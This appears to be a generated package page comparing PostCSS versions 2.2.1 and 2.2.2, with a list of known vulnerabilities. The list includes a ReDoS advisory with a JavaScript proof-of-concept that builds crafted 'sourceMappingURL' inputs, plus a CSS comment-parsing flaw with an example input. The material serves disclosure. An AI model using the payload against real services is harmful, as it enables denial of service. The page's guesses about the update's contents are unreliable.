PostCSS is a framework designed for CSS postprocessors, providing robust source map support. Version 2.2.2 builds upon the foundation laid by version 2.2.1, offering a refined experience for developers. Both versions share identical dependencies, relying on js-base64 and source-map for core functionalities. Similarly, the development dependencies remain consistent, encompassing tools like gulp, cssom, mocha, rework, and more, indicating no significant shifts in the development workflow. This suggests the update focuses on internal improvements and bug fixes rather than introducing new features or altering existing functionalities.
The versions are under the MIT license and maintained in the same GitHub repository. Both versions are created by Andrey Sitnik.
The key difference lies in the release date, with version 2.2.2 released on August 27, 2014, a few days after version 2.2.1 released on August 22, 2014. This short interval suggests that version 2.2.2 likely addresses immediate issues discovered in the preceding version, potentially including bug fixes, performance enhancements, or minor compatibility adjustments. Developers already using PostCSS should consider upgrading to version 2.2.2 to benefit from these refinements and ensure compatibility with the latest toolchain improvements. You can retrieve each one from the specified registry tarball url.
All the vulnerabilities related to the version 2.2.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.